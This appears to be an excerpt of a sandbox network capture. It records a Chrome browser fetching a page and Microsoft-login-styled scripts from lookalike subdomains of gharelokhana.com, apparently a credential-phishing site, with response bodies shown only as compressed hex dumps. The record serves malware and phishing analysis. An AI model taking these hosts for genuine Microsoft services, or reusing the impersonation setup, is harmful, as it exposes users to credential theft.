                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                access-control-allow-origin: *
                                                x-azure-ref: 20241205T072417Z-15b54885d96pp57jhC1FRAe3c0000000075000000000n0zv
                                                x-fd-int-roxy-purgeid: 4554691
                                                x-cache: TCP_HIT
                                                accept-ranges: bytes
                                                content-encoding: gzip
                                                2024-12-05 07:24:17 UTC15572INData Raw: 1f 8b 08 00 00 00 00 00 00 03 dd 7d 4d 73 23 c7 92 d8 dd bf 02 0f cf f1 86 5c f5 40 f8 e0 27 46 d0 18 04 c0 19 ec 90 00 04 80 33 52 48 32 a2 09 14 c1 7e 04 ba b1 dd 8d e1 f0 51 e3 78 37 1f f6 e0 ab 7d f3 c1 27 1f 7d f1 dd 3f 65 23 d6 bf c3 f9 51 55 5d d5 dd 00 c8 91 56 6f d7 0a c5 10 dd f5 95 95 95 95 95 99 95 99 fd 87 9b b5 3f 8d bd c0 df 13 fb 8f ea 77 21 d8 f3 f7 1f bd 9b 3d ef 47 ff e7 fd 50 c4 eb d0 2f e0 ef 92 f8 b4 0a c2 38 7a f5 d1 0d 0b 71 03 5f 35 1e e5 bb fa e3 67 c7 9b d5 7d 67 11 b8 33 31 ab ff a1 f2 f9 95 6c 2a b0 e9 d4 5d 2c f6 62 d5 83 13 3b c9 ef 60 1f 1e b8 59 e3 0f e5 a4 e0 33 0e e3 35 1e 75 47 41 69 d9 10 4e 50 9a 36 3c f8 77 d5 28 16 9d 60 af bc ff 79 ef c7 64 1a 4e e0 78 00 fc 5e 75 9f a0 f4 1b de 5e 05 fa 87 3f 87 fb 4e 08 7f 8e f6
                                                Data Ascii: }Ms#\@'F3RH2~Qx7}'}?e#QU]Vo?w!=GP/8zq_5g}g31l*],b;`Y35uGAiNP6<w(`ydNx^u^?N
                                                2024-12-05 07:24:17 UTC773INData Raw: e8 04 1b c0 7a 77 4c f1 70 ee 03 7e b9 52 66 00 e0 2d 4b 19 b6 30 82 b4 8c 07 10 e2 6a 41 51 4f 3c 0d 86 9c fb 90 51 1e b8 7e 38 ef ac ca 5b ce 0d e6 a8 e8 40 1c 3c 54 74 00 12 3d d5 58 6e a1 df 32 fc 96 7e 1f e6 a4 0f c0 6d c1 20 4b f4 e5 94 23 08 f2 7a 2b a7 b0 22 f9 95 e1 1b bc 5a 63 78 0f a0 e3 c1 92 39 86 02 bf 1f 40 12 07 fe c0 04 ed 43 f1 51 60 30 01 9f 99 b9 11 22 9c 9c 46 f5 21 03 4e d8 91 99 23 47 70 69 f5 43 13 bf cf 2b a3 5b 30 aa 4d 00 19 ad 61 59 30 a3 07 1c ad 07 46 55 f6 20 7e 60 b4 50 c6 37 58 14 8d 87 24 dd 1a 60 1d ef 0e ff 78 de 3c 3f 3d 3f 29 da 42 15 9f 5b 3c cd 11 b4 5f 48 e5 b0 5e 8c 8c 27 d8 05 98 35 59 15 2d 93 07 3e a7 63 10 ab 63 49 07 c0 d2 95 1b 8e 96 fc d4 b9 0c ab 80 76 df 91 f7 17 e2 c7 c6 08 08 ae 98 e1 2e 77 5a 67 fd 21
                                                Data Ascii: zwLp~Rf-K0jAQO<Q~8[@<Tt=Xn2~m K#z+"Zcx9@CQ`0"F!N#GpiC+[0MaY0FU ~`P7X$`x<?=?)B[<_H^'5Y->ccIv.wZg!


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                21192.168.2.549875164.92.191.864435840C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-05 07:24:16 UTC815OUTGET /Me.htm?v=3 HTTP/1.1
                                                Host: l1ve.gharelokhana.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Purpose: prefetch
                                                Sec-Fetch-Site: same-site
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: empty
                                                Referer: https://djdjkdlellekkff.gharelokhana.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
                                                2024-12-05 07:24:17 UTC514INHTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Thu, 05 Dec 2024 07:24:17 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Content-Length: 1434
                                                Connection: close
                                                cache-control: max-age=315360000
                                                vary: Accept-Encoding
                                                p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                referrer-policy: strict-origin-when-cross-origin
                                                x-ms-route-info: C546_BL2
                                                x-ms-request-id: b4ddeda1-8ce8-45e6-9ce4-d9f3c08dd61d
                                                ppserver: PPV: 30 H: BL02EPF0001D97D V: 0
                                                content-encoding: gzip
                                                access-control-allow-origin: *
                                                access-control-allow-headers: *
                                                2024-12-05 07:24:17 UTC1434INData Raw: 1f 8b 08 00 00 00 00 00 00 03 b5 57 df 6f db 36 10 7e ef 5f 61 13 45 20 2e 9c 22 d9 4e 52 cb 61 83 a1 eb 50 17 4d 5b 54 1d f6 e0 6a 00 23 51 36 1b 99 14 48 da 6d e1 e8 7f df e9 97 65 ab 5b 96 3e f4 21 b1 7c bc 3b 7e df f1 ee a3 7c 65 62 2d 72 3b b0 df 72 4e 91 e5 5f ed d9 67 b6 65 b5 15 3d 7f 32 18 a6 1b 19 5b a1 a4 63 09 c7 bb 54 69 67 cb f4 c0 0c 84 1c 70 6c 17 26 a2 1c fe 15 8e 5d 09 43 3a 67 70 6d 9e 07 dc 91 78 27 52 c7 2c 64 84 35 b7 1b 2d 07 e5 b3 cb bf e6 4a 5b 33 2b 13 0a 5a 9a e8 ae b1 05 bb 82 88 24 90 24 53 2c e1 49 30 f4 8b 59 13 6a cb d0 98 65 99 23 da 0c 44 90 ee 99 63 f8 52 87 d1 a1 d7 2d 14 15 6e ba db 27 e2 ee 9a 02 29 37 a6 10 e4 e6 14 21 c2 1d 0f 17 ce a2 c7 b9 25 62 2a 5a 4d 05 38 4d 17 61 44 0c f5 88 a4 dc cd b8 5c da d5 cc 5c c9 d9
                                                Data Ascii: Wo6~_aE ."NRaPM[Tj#Q6Hme[>!|;~|eb-r;rN_ge=2[cTigpl&]C:gpmx'R,d5-J[3+Z$$S,I0Yje#DcR-n')7!%b*ZM8MaD\\


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                22192.168.2.549877164.92.191.864435840C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-05 07:24:17 UTC719OUTGET /shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js HTTP/1.1
                                                Host: 33767741-3c4125ca.gharelokhana.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: */*
                                                Sec-Fetch-Site: same-site
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: script
                                                Referer: https://djdjkdlellekkff.gharelokhana.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
                                                2024-12-05 07:24:18 UTC806INHTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Thu, 05 Dec 2024 07:24:18 GMT
                                                Content-Type: application/x-javascript
                                                Content-Length: 61138
                                                Connection: close
                                                cache-control: public, max-age=31536000
                                                last-modified: Thu, 25 May 2023 17:22:47 GMT
                                                etag: 0x8DB5D44A8CEE4F4
                                                x-ms-request-id: 0e67a5c9-001e-0063-59d0-442912000000
                                                x-ms-version: 2009-09-19
                                                x-ms-lease-status: unlocked
                                                x-ms-blob-type: BlockBlob
                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                access-control-allow-origin: *
                                                x-azure-ref: 20241205T072418Z-15b54885d96pp57jhC1FRAe3c0000000077000000000chsc
                                                x-fd-int-roxy-purgeid: 0
                                                x-cache: TCP_HIT
                                                accept-ranges: bytes
                                                content-encoding: gzip
                                                2024-12-05 07:24:18 UTC15578INData Raw: 1f 8b 08 00 00 00 00 00 00 03 cc bd 7b 5b db 48 b2 38 fc ff f9 14 46 cf 1e 56 5a 14 c7 86 24 93 b1 a3 e1 10 70 12 cf 70 5b 2e 73 59 c2 f2 08 b9 c1 4a 6c c9 23 c9 10 16 fc dd 7f 55 d5 77 5d 0c cc cc 79 cf fb cc 04 4b ad ea 7b 75 75 75 75 5d dc db 38 19 a5 b7 ed 82 4d d8 94 15 d9 dd c5 2d bb 9c 85 d1 d7 1f f3 34 99 05 4b bf 3e 3c 9c 9d 7b ed d9 3c 1f bb 67 67 eb e7 fe 99 ef fb 57 f3 24 2a e2 34 71 99 5f f8 89 77 ef cc 73 d6 ca 8b 2c 8e 0a a7 9f b4 33 b7 f0 fc a4 3d 72 0b df f9 39 9c cc d9 4f 50 81 e3 bb 2a 9b 77 9f b1 62 9e 25 ad ac cd 16 9e 82 1d dc b0 a4 d8 0d 0b 96 44 77 0d e0 61 19 fc 90 65 79 9c 63 16 d6 90 e5 d2 c8 72 92 85 11 db 65 37 6c d2 00 3c 32 80 b7 66 b3 61 92 c7 d7 e3 22 df 4e b3 fa e2 63 ab 45 ef c3 9c 35 82 9a 45 5f 0c be 41 93 47 6c 34 4c
                                                Data Ascii: {[H8FVZ$pp[.sYJl#Uw]yK{uuuu]8M-4K><{<ggW$*4q_ws,3=r9OP*wb%Dwaeycre7l<2fa"NcE5E_AGl4L
                                                2024-12-05 07:24:18 UTC12556INData Raw: 93 2b a1 3d e1 4c 43 5e d4 7a c0 b1 45 35 25 4f aa 68 15 9e 1d 46 4d 57 30 f6 ef fc 81 bf 4f d5 ac a0 48 48 17 85 ca 9e 5a 96 94 7b ee 5d f9 3a 8a 8f a2 2a 16 77 57 f2 7a a4 8a 50 c5 13 a9 19 4a fa 32 66 46 28 ac 43 c6 bd 19 68 51 90 87 06 50 37 05 de 25 e4 33 d8 02 56 57 ed 77 68 97 1f 99 3a f1 90 3f b2 6f 36 ef 1a 87 87 ab 91 71 d9 0b 67 93 6f 6b e8 a5 34 d0 a4 b6 71 75 75 5f cc 82 8f 96 69 ba b1 7e 1c fc 0d d5 50 70 0b 14 9c 01 0f fd 33 f8 56 6c 5f 5d e3 bd 99 ba c8 30 c3 2e d5 b9 db 26 4f db 09 97 d6 60 41 c0 7e 92 4f 66 c5 f3 23 00 a9 23 17 a6 c3 a1 70 e1 8e 81 94 14 ee 2d 05 f9 03 94 fe 85 49 9c 41 d1 13 24 7c 60 ee 81 7f db 28 7a 16 7d 23 3f a4 04 ff ab bd 8d bb 65 36 a1 6c 15 60 71 0f f7 87 e2 26 08 96 ed 21 bf 04 ea 25 8b be 75 42 76 f9 ed 86 63
                                                Data Ascii: +=LC^zE5%OhFMW0OHHZ{]:*wWzPJ2fF(ChQP7%3VWwh:?o6qgok4quu_i~Pp3Vl_]0.&O`A~Of##p-IA$|`(z}#?e6l`q&!%uBvc
                                                2024-12-05 07:24:18 UTC16384INData Raw: 4b d3 67 84 ca 68 72 ae bc 21 de 96 18 88 1f 1a 8c d9 54 61 67 90 37 b1 64 23 29 45 4b f3 b9 46 9d 04 62 0c 65 7c 9d 14 33 ff 95 92 3a 82 13 0a b9 e1 6f 1f de bf 2b 8a 89 3c ef 5a d0 b1 b6 96 ba 03 e8 12 48 d9 fb 65 8d d2 e6 e5 eb c7 49 98 e7 7b 5f c2 87 43 96 48 00 da 85 42 df 2b 63 74 90 eb 80 d3 37 5a 5c d6 17 0c c7 b9 03 35 dc 41 83 b6 ad 60 4a 42 0a f4 ad a2 e0 97 86 32 1f 01 a1 d2 69 e1 b0 a7 f3 f9 dc ff 3e dd 84 7a 9e 60 66 f0 6b de d4 96 88 97 72 1e c3 a5 1c d0 d4 28 f1 ae b6 c4 60 29 df 68 ba 94 5b 97 2f e5 a2 8e 96 f2 d1 c6 4b 39 a0 43 a3 c4 f9 52 9e f1 4f 4b 79 c6 f5 1c bf c9 52 5e dc 95 51 e2 70 29 df f9 d7 a5 7c e7 b7 4b f9 ce f5 fc 4d 93 ef 5c cf 89 35 f9 ce c3 7a 26 ba c9 78 3e 5e ca 78 3e 5b ca 78 de 5f ca 78 7e bd 94 f1 5c cf ac 35 19 cf
                                                Data Ascii: Kghr!Tag7d#)EKFbe|3:o+<ZHeI{_CHB+ct7Z\5A`JB2i>z`fkr(`)h[/K9CROKyR^Qp)|KM\5z&x>^x>[x_x~\5
                                                2024-12-05 07:24:18 UTC16384INData Raw: e5 bc 0d 5c fc 04 82 60 d2 db 97 bd 92 17 1c b1 24 32 04 db 7c c8 2b 5a 51 66 90 a3 c8 94 7a 57 58 17 19 37 83 32 97 c3 f4 2c 0a b3 61 7a 5f e7 1b 25 0b 24 3b 58 fa ee 67 d9 c9 82 ae 6e 52 4a 53 2a 1a bb 2c 54 61 1f 52 d6 e1 44 0d d6 d9 85 33 38 00 14 3e 05 d3 ef 15 67 0d 94 38 6b fc ef c1 ff 4d e5 db 6f 53 5c 00 9b 32 ba d7 0b 01 ff 71 2f 8c e4 35 0a 55 8f dd 4d e1 db 0f d7 6b 5f de 17 77 78 37 7d fd 99 18 53 a4 e4 8b 88 bf 5c 40 a5 b6 34 ef d1 02 66 98 4e 34 d8 b5 03 8c a6 f9 a1 42 99 5f d9 8e 32 05 17 0e 26 8c 82 dd 42 95 25 2f 23 d3 98 b1 40 78 14 33 30 54 c1 0c c0 a5 6e f4 68 8a ba 17 3d 38 8f a1 33 49 04 77 9b e3 2f 5d b9 99 f4 8a 19 23 e2 e7 e2 5e a3 7d c4 d9 4f b9 d2 88 61 4f 26 cb b0 9d 77 4d 19 e5 25 6d 6e 98 f7 d6 f9 36 ca 64 01 c2 58 58 1c 58
                                                Data Ascii: \`$2|+ZQfzWX72,az_%$;XgnRJS*,TaRD38>g8kMoS\2q/5UMk_wx7}S\@4fN4B_2&B%/#@x30Tnh=83Iw/]#^}OaO&wM%mn6dXXX
                                                2024-12-05 07:24:18 UTC236INData Raw: a2 f4 1e f3 dd 94 ee ea f4 c9 c6 37 3c 61 17 e6 82 bc 0b ea 02 bb 0c 16 0b 18 b9 78 76 59 16 78 02 d3 a5 9a aa 71 5d a4 74 80 a6 7c 58 b9 89 5e 81 ca 21 39 f9 2a 46 b7 0d df 8d 64 a2 1f 29 b0 3d 61 f3 10 4f 67 3c cc 72 6b 33 b5 60 78 ed 8d 5c b2 14 0d 3c 04 c9 d1 84 96 4f ce f2 35 91 c0 f0 d5 32 dc 57 ce 71 58 ef d8 12 e4 07 6d 72 33 18 d2 9f 99 a4 b9 99 a4 b0 6e 7f a6 a6 d8 11 d9 77 7d 03 a6 42 be 49 df 65 3c a1 6e 4b ac 46 27 02 29 c5 a6 7a dd 8e 38 05 52 4c dc 9b da 81 ba 3b c2 84 5a eb ee 0a 1d b3 b4 bb 77 e7 df 8d 40 d4 fe 8f c7 8f ff 73 a3 c8 96 39 32 ea 8b 05 10 89 8f 27 6f 83 2c 8d 0e 8b f3 69 27 6a 4d 77 c3 56 e7 d9 fe 93 d6 b4 dd 9a 3c 7d d6 69 7e 29 9a f3 70 f1 3f 88 9b 68 bf 3f e7 02 00
                                                Data Ascii: 7<axvYxq]t|X^!9*Fd)=aOg<rk3`x\<O52WqXmr3nw}BIe<nKF')z8RL;Zw@s92'o,i'jMwV<}i~)p?h?


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                23192.168.2.549878164.92.191.864435840C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-05 07:24:17 UTC546OUTGET /shared/1.0/content/js/ConvergedLogin_PCore_i5YupurhQAo9inu_OetqHw2.js HTTP/1.1
                                                Host: 33767741-3c4125ca.gharelokhana.com
                                                Connection: keep-alive
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: */*
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
                                                2024-12-05 07:24:18 UTC807INHTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Thu, 05 Dec 2024 07:24:18 GMT
                                                Content-Type: application/x-javascript
                                                Content-Length: 122366
                                                Connection: close
                                                cache-control: public, max-age=31536000
                                                last-modified: Fri, 01 Nov 2024 20:24:27 GMT
                                                etag: 0x8DCFAB32EE49129
                                                x-ms-request-id: 35db6eb3-d01e-003d-3b8c-46c2f2000000
                                                x-ms-version: 2009-09-19
                                                x-ms-lease-status: unlocked
                                                x-ms-blob-type: BlockBlob
                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                access-control-allow-origin: *
                                                x-azure-ref: 20241205T072417Z-15d6f6465c8r6bl7hC1DUSwb3w00000001eg00000000mewc
                                                x-fd-int-roxy-purgeid: 0
                                                x-cache: TCP_HIT
                                                accept-ranges: bytes
                                                content-encoding: gzip
                                                2024-12-05 07:24:18 UTC13653INData Raw: 1f 8b 08 00 00 00 00 00 00 03 e4 bd 7b 57 e3 b8 b2 38 fa ff fd 14 c1 7b 5f 26 19 4c 3a ce 8b c4 b4 87 13 02 74 b3 07 08 43 a0 67 f6 a1 d9 2c c7 56 82 07 c7 ce b1 1d 1e 3b e4 7c f6 5f 55 49 b2 e5 c4 a1 bb e7 9c 75 ef ba eb ee 47 13 4b a5 57 a9 54 aa 2a 95 4a 1f 7e de fa bf 4a 3f 97 76 bf ff 3f a5 e1 75 ef ea ba 34 38 29 5d 7f 3e bd 3a 2a 5d c2 d7 3f 4b 17 83 eb d3 fe f1 f7 d7 83 8d e2 ff af 1f bc b8 34 f6 7c 56 82 bf 23 3b 66 6e 29 0c 4a 61 54 f2 02 27 8c 66 61 64 27 2c 2e 4d e1 df c8 b3 fd d2 38 0a a7 a5 e4 81 95 66 51 f8 27 73 92 b8 e4 7b 71 02 85 46 cc 0f 9f 4b 65 a8 2e 72 4b 97 76 94 bc 96 4e 2f 2b 55 a8 9f 41 6d de c4 0b a0 b4 13 ce 5e e1 f7 43 52 0a c2 c4 73 58 c9 0e 5c aa cd 87 8f 20 66 a5 79 e0 b2 a8 f4 fc e0 39 0f a5 73 cf 89 c2 38 1c 27 a5 88 39
                                                Data Ascii: {W8{_&L:tCg,V;|_UIuGKWT*J~J?v?u48)]>:*]?K4|V#;fn)JaT'fad',.M8fQ's{qFKe.rKvN/+UAm^CRsX\ fy9s8'9
                                                2024-12-05 07:24:18 UTC16384INData Raw: 6a 5a af 9e 7c da 9c d0 d7 7d cb 39 d0 f6 63 b4 b6 32 0d e8 5e 9f f3 01 0a cf 48 e9 2d 96 3d 2f ee 28 af 06 f2 39 80 bd 77 4c 61 19 ca da a2 b6 b4 4a 90 8f 87 1b 56 75 61 2c f7 67 40 9e d6 a2 be dc e7 34 09 c4 d9 58 2e 9a cb 45 6b a9 e9 5c fd 3e ae 66 e4 aa fb fa 5c 31 88 fc 8f eb f7 8a ea 5f ea cf 91 97 ac f3 6f dd d6 43 61 10 58 f0 27 d5 c2 03 40 2d 22 c5 b7 94 53 1f 6c 5c 99 92 7d 10 38 7d fa 86 a5 5d d3 cf a1 43 d5 a9 fd 02 3f 7d f9 d2 7c bd c2 39 d6 dc 72 77 7c ce 02 a9 e4 71 95 7a 82 c6 71 ba 56 6b ab dd 39 a0 79 b8 e4 eb 13 3b 5f e6 67 ef fa 5c 74 52 8c 23 5f 7a 75 54 72 4c 3e 99 ad 39 6f ad 1c 0b 85 06 60 c2 ca 3e bd cb 9d 3d 49 68 79 c0 be 48 76 16 72 63 46 c8 62 14 fa cc b2 81 68 24 c6 81 f8 10 47 63 44 97 9c 1b 6d 27 c4 b4 89 15 71 72 9c 5a 49
                                                Data Ascii: jZ|}9c2^H-=/(9wLaJVua,g@4X.Ek\>f\1_oCaX'@-"Sl\}8}]C?}|9rw|qzqVk9y;_g\tR#_zuTrL>9o`>=IhyHvrcFbh$GcDm'qrZI
                                                2024-12-05 07:24:18 UTC16384INData Raw: c3 34 73 86 c0 a7 21 c3 03 1c d2 0e 81 69 1e a8 e3 d4 ff 3d ea 3e 06 f2 a5 a7 65 74 61 44 3f 64 03 d2 85 ec 8c c7 48 19 dc 44 0f 90 03 55 2a 93 34 cb f8 84 d9 0b c6 b8 5e c4 eb 99 57 5f 18 5c c9 a4 ab 81 ff 4a 4d f9 dd 3c ca 7d ed 7b 2d ab b0 63 1b b1 1d db 8c 62 fc 41 c6 0f 51 1e a0 57 96 3f 45 bd e3 9e 96 d2 35 1f 3d d4 f1 92 5f 8d 79 f2 c2 71 5c 89 42 67 df b9 3d f7 0a 29 60 bc 8f 16 de 2e 2e be 83 39 b8 69 e2 88 ba 6f fc 82 d5 c0 35 7b e0 4f 9b 25 e2 97 18 19 fb 57 f7 13 14 81 14 1b c6 41 58 99 13 08 21 42 f8 8a d5 35 a7 b3 83 94 02 c7 d2 3e 49 4d 3c 61 5b 60 75 4c a2 0a 6d 54 20 c8 21 3d 18 11 39 48 26 7e 30 42 f3 72 09 aa 31 6a de c2 0e 08 86 84 44 f8 7c 88 04 77 57 f4 62 6d a5 da 8b dc 5e db 66 c0 a3 5d c6 02 db 03 6a 48 ca 08 ec e3 c8 7d 5b 6d b6
                                                Data Ascii: 4s!i=>etaD?dHDU*4^W_\JM<}{-cbAQW?E5=_yq\Bg=)`..9io5{O%WAX!B5>IM<a[`uLmT !=9H&~0Br1jD|wWbm^f]jH}[m
                                                2024-12-05 07:24:19 UTC16384INData Raw: bf 8b f2 7d 20 85 60 a1 e7 9f 70 7c b8 19 cd af fd 6a d6 03 56 5d 70 86 9d ea fb 0f c1 98 df 7d a8 a9 e7 04 0e c8 9d d1 88 33 1c d5 64 60 10 1a f4 7e e5 3c 27 e6 58 28 49 a5 68 e0 5e e9 35 ad 06 be 9b 8e 27 2c 0c 12 43 66 66 64 99 34 bf e2 df c6 eb 01 ed f4 03 de f6 e1 e7 38 bf c6 80 64 27 a9 1c e2 9f cd 71 81 6b 09 e6 e7 96 cf 07 31 09 66 0e 3e 22 d4 d0 bc 33 5b 33 8e a2 9b 63 65 02 cf 59 7a 66 01 b8 d7 b0 0d fc f2 d8 6c 2e dd 0e c5 db 23 f3 6d 9d 11 28 67 dc 35 f2 a9 03 b3 28 e9 da 6c c4 84 8c 22 78 5e cc 3a f2 74 38 1c 45 fb e9 2d ce cd 5e 96 ed 21 11 cc 39 df 98 b3 6c 30 9f 94 e1 ad 99 61 9a 7c 9d 04 e3 f2 70 0c 6a 86 d3 d8 13 27 e6 5a 0a c9 26 d0 5c 4b 47 e6 a8 e3 86 85 b9 df 63 5b 73 31 22 aa 2d d4 0a 55 b7 bc 72 35 15 1e f2 ec 40 aa cf 79 53 e3 11
                                                Data Ascii: } `p|jV]p}3d`~<'X(Ih^5',Cffd48d'qk1f>"3[3ceYzfl.#m(g5(l"x^:t8E-^!9l0a|pj'Z&\KGc[s1"-Ur5@yS
                                                2024-12-05 07:24:19 UTC16384INData Raw: 95 11 52 51 2b 42 9c 88 2b f8 5b 8f 40 44 cd 78 6f bc 67 c4 0b b6 60 3a 0a 34 cf 1e 63 3d 9a 7e 83 7e cc 7c a0 8f 82 2d 17 47 2f 78 63 fd cd 6a 95 f2 5a 40 d6 09 e8 6f 92 69 6c 3c 69 6c d7 dd 4e af 89 5a b2 45 4e dd 54 0e 4c 6a 29 27 10 f9 7e e6 2d 82 46 45 91 2d 9a 66 d5 42 50 f4 11 12 30 d2 e8 34 49 e1 94 ba 12 e0 49 f6 f4 69 a6 08 a8 16 17 21 1a 0c dc 6c a9 66 51 ab 4f 62 76 a1 f5 b3 87 87 88 4f 1c f9 32 f4 0c d2 56 98 15 74 41 d8 69 6b f5 7f 59 76 84 6f 53 77 03 18 11 68 d6 29 58 ce 3c f6 90 cd dc e9 9f 11 2c bb 2b ea a8 46 81 b7 33 14 c2 bd ed d1 03 4f c8 c7 c5 53 99 4a 4d a7 12 04 ad 7f ad e7 8a 9f 84 44 48 53 4e 06 ab 24 46 f8 27 4f a3 3b a8 1f 56 d9 a5 cf be 8b 05 03 5b 64 22 fa 9a fa 23 ae 48 4b 2e 97 c9 78 1c a7 8f 38 b0 a8 86 fe 29 0f 16 9b 2d
                                                Data Ascii: RQ+B+[@Dxog`:4c=~~|-G/xcjZ@oil<ilNZENTLj)'~-FE-fBP04IIi!lfQObvO2VtAikYvoSwh)X<,+F3OSJMDHSN$F'O;V[d"#HK.x8)-
                                                2024-12-05 07:24:19 UTC16384INData Raw: 27 74 6f 15 a8 a6 f3 6c a9 db 67 66 2a 29 60 bb dd 17 b3 f9 a6 96 47 1f 84 3a 38 ba 47 cd af 58 f8 3d 85 97 59 55 5a e9 96 86 54 77 64 6d 88 04 ed 2b 7b 39 b2 68 66 57 76 b8 d1 fe 77 93 0f f5 a5 6f 07 f2 b2 0e 1e 15 aa 62 5a cb b6 c9 e6 a6 4d ae 9d 6b 07 ba d5 e4 be bc ec 6e 4d 27 b4 be bb 7b f7 bb e5 3d 74 97 fd 87 d3 b5 77 a4 f5 c2 24 34 bc 22 1b e2 c8 3a a3 e3 0d ff 9a 3c ec dc ac 7d 36 83 02 c0 84 68 0e b9 1f a1 24 d9 ba 3f d0 5b 95 63 aa f9 74 6c 0d ce 20 d0 61 0b 0d ac 7f cf 96 59 12 fb 7d 21 87 c3 ab d3 2c 2e ac ff 6b 3d 1b 37 e6 d5 c8 fa 9f c9 0f 14 00 f7 e6 e4 e8 ec a4 15 4f 6a fd 5f a9 6e 03 c1 e2 89 91 0e 40 d2 37 9f 82 df fc ac 34 a6 73 b4 f6 62 5c 9f 52 5a de 39 d4 b9 70 e7 63 53 80 6e 30 a5 5d 33 bc 39 aa 9e aa c8 24 a5 df ea f1 50 6e e3 53
                                                Data Ascii: 'tolgf*)`G:8GX=YUZTwdm+{9hfWvwobZMknM'{=tw$4":<}6h$?[ctl aY}!,.k=7Oj_n@74sb\RZ9pcSn0]39$PnS
                                                2024-12-05 07:24:19 UTC1819INData Raw: 2e 1f 00 9e 72 de ee b2 e9 c0 54 ae 45 e5 c1 6c 5d d4 ac f7 b8 cc 30 dd 5d ae 0d 06 dc fa a6 9f 12 c1 c7 2d 83 78 d0 63 24 d3 65 0e 9d b8 25 55 eb 69 7d 10 75 b0 d9 1e 3b af 8b f4 37 70 6c 0c db 35 7b b9 bf fc c3 b6 9b d3 d4 51 c9 45 97 ef 1f 0d 47 fd 95 0b 71 05 9c da 05 4b f5 f0 ab 53 ed 0d 85 fd 5f 69 9a 77 fc bd e4 74 eb 6d 67 76 f5 44 ad e9 47 7d 6d 28 cf ef 27 c6 bd 5a 87 72 67 52 a5 c1 39 1d f2 da 3c 01 a4 fd d4 f3 be da 84 9c bd b9 02 f2 b6 83 ba af 36 39 d4 db 30 93 97 9d de d5 f0 2a af fb 5a 05 e3 b4 bf f6 d4 b7 2b 5d d1 ee cf b7 5c cd ba b5 1e d9 64 86 b3 31 44 ef 93 fd 10 a6 72 49 1e 92 8f 1f 07 fb 83 9e 3e da cb dc 2f 49 7a bb 69 ef 0a 3c 6a 42 5d eb ab 0e da f1 bd c3 2b 3c 2a 9d 46 26 ea 0c d1 ea 2e 65 6d e4 f6 6c 4d de c1 47 f6 d3 7a 24 c0
                                                Data Ascii: .rTEl]0]-xc$e%Ui}u;7pl5{QEGqKS_iwtmgvDG}m('ZrgR9<690*Z+]\d1DrI>/Izi<jB]+<*F&.emlMGz$
